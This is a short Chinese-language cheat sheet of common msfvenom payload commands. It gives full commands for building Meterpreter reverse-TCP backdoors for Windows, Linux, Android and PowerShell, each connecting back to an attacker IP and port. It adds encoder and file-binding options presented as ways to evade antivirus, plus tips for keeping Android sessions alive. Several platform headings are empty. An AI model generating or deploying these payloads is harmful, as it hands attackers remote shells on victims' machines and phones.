Msfvenom常用payload

payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。也有人把payloads称 为shellcode。

windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp
LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

android

捆绑文件Android需要先:

sudo apt install zipalign

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

生成的安卓MainActivity一段时间会失效,需要show advanced,set exit on session 为false 和session communication timeout =0 默认会话是300秒断开

powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

mac

php

aspx

jsp

war

python

nodejs

perl

ruby

lua

windows shellcode

linux shellcode

show options

  1. -l:列出所有的payload

  2. -p:指定要加载的payload

  3. -f:指定生成的格式输出:

  4. 可以生成一句话木马 asp,aspx,php等等

  5. 可以支持 py,java,c,bash,python等等

  6. 可以支持 exe,dll,elf,vbs,war等等

  7. -e:使用编码器,选择加壳encode

  8. -a:精确编码 生成的payload用于32位操作系统,指定-a x86

  9. -s:生成payload的时候可以指定最大多少

  10. -b:去除空代码或者错误代码减少多余的字符同时减少体积

  11. (-b \x00\xff)

  12. -i:指定编码次数(不好用,过不去网页查杀)

  13. -x:捆绑一个正常文件

  14. -o:指定输出位置

Last updated

Was this helpful?